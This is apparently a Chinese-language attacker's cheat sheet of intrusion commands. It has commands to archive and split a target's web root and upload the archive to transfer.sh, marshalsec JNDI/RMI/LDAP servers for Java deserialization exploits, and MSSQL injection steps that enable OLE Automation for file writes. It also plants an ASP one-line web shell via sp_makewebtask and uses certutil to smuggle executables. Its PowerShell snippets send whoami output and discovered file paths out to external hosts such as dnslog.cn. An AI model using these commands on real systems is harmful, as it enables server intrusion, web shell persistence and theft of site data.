笔记

1 打包

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
"C:/Program Files/7-Zip/7z.exe" a D:\upload\2020\7\13\www.zip C:\inetpub\wwwroot\ -r -x!*.zip -x!*.7z -v200m

Rar.exe a -r -v500m -X*.rar -X*.zip sst.rar D:\wwwroot\sq\

tar -zcvf /tmp/www.tar.gz --exclude=upload --exclude *.png --exclude *.jpg --exclude *.gif --exclude *.mp* --exclude *.flv --exclude *.m4v --exclude *.pdf --exclude *.*tf --ignore-case /www/ | split -b 100M -d -a - www.tar.gz.

合并
copy /b www.tar.z01+www.tar.z02 backup.tar.gz

zip -s 100m -r -q -P password file.zip *.sql

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
<?php
function addFileToZip($path,$zip){
    $handler=opendir($path); //打开当前文件夹由$path指定。
    while(($filename=readdir($handler))!==false){
        if($filename != "." && $filename != ".."){//文件夹文件名字为'.'和‘..’，不要对他们进行操作
            if(is_dir($path."/".$filename)){// 如果读取的某个对象是文件夹，则递归
                addFileToZip($path."/".$filename, $zip);
            }else{ //将文件加入zip对象
                $zip->addFile($path."/".$filename);
            }
        }
    }
    @closedir($path);
}
$zip=new ZipArchive();

if($zip->open('/tmp/backup.zip', ZipArchive::OVERWRITE)=== TRUE){
    addFileToZip('/www/wwwroot/', $zip); //调用方法，对要打包的根目录进行操作，并将ZipArchive的对象传递给方法
    $zip->close(); //关闭处理的zip文件
    echo 1;
}

2 git

1
2
3
git submodule update --init --recursive
git submodule update --rebase --remote
git submodule update --remote --merge

3 java

1
-Djava.rmi.server.useCodebaseOnly=false -Dcom.sun.jndi.rmi.object.trustURLCodebase=true -Dcom.sun.jndi.ldap.object.trustURLCodebase=true -DsocksProxyHost=IP -DsocksProxyPort=8010

1
2
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://ip:80/#ExportObject 1099
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://ip:80/#ExportObject 1099

4 网盘

1
curl --silent --upload-file file.zip https://transfer.sh/file.zip >> upload.txt &

5 注入

MSSQL写入大文件

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
-- 开启权限（开启这2个权限后才能写文件）
-- 开启
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;
-- 关毕
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',0;RECONFIGURE;
-- 写文件 这里@FilePath 是路径，@STR_CONTENT 是内容，整理流程是先创建在写入。t-sql读写文件
declare @FilePath nvarchar(400),@xmlstr varchar(8000);
Declare @INT_ERR int;
Declare @INT_FSO int;
Declare @INT_OPENFILE int;
Declare @STR_CONTENT as varchar(MAX);
DECLARE @output varchar(255);
DECLARE @hr int;
DECLARE @source varchar(255);
DECLARE @description varchar(255);
set @FilePath = 'c:/windows/tasks/111.txt';
set @STR_CONTENT = convert(varchar(MAX),0x313233);
EXEC @INT_ERR = sp_OACreate 'Scripting.FileSystemObject', @INT_FSO OUTPUT;
if(@INT_ERR <> 0) BEGIN EXEC sp_OAGetErrorInfo @INT_FSO RETURN END;
EXEC @INT_ERR=SP_OAMETHOD @INT_FSO,'CreateTextFile',@INT_OPENFILE OUTPUT,@FilePath;
EXEC @INT_ERR=SP_OAMETHOD @INT_OPENFILE,'Write',null,@STR_CONTENT;
EXEC @INT_ERR=SP_OADESTROY @INT_OPENFILE;
-- 配合certutil实现exe转base64
certutil -encode 1.exe 1.txt
-- base64解码
certutil -decode 1.txt 1.exe

MSSQL注入把指定sql语句查询的东西写入文件

1
2
3
exec sp_configure 'Web Assistant Procedures', 1; RECONFIGURE;
exec sp_makewebtask 'c:\www\test.asp','select ''<%execute(request("SB"))%>'' '
exec master..xp_cmdshell 'type c:\www\test.asp'

6 powershell

注入通过http带外数据

1
$t= whoami;$t=[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($t));Invoke-WebRequest http://localhost/ -UseBasicParsing -Method POST -Body $t

通过powershell遍历盘符找绝对路径

1
2
3
4
5
6
7
8
9
$pan=[Environment]::GetLogicalDrives()
$pan|ForEach-Object {
    $t=Get-ChildItem -Path $_ -Recurse -Include *.php -ErrorAction SilentlyContinue
    $a=''
    $t|ForEach-Object{
        if($_.FullName.Contains('login.php')){$a=$a+$_.FullName}
    }
    Invoke-WebRequest -Uri "http://dnslog.cn/" -UseBasicParsing -Method Post -Body $a
}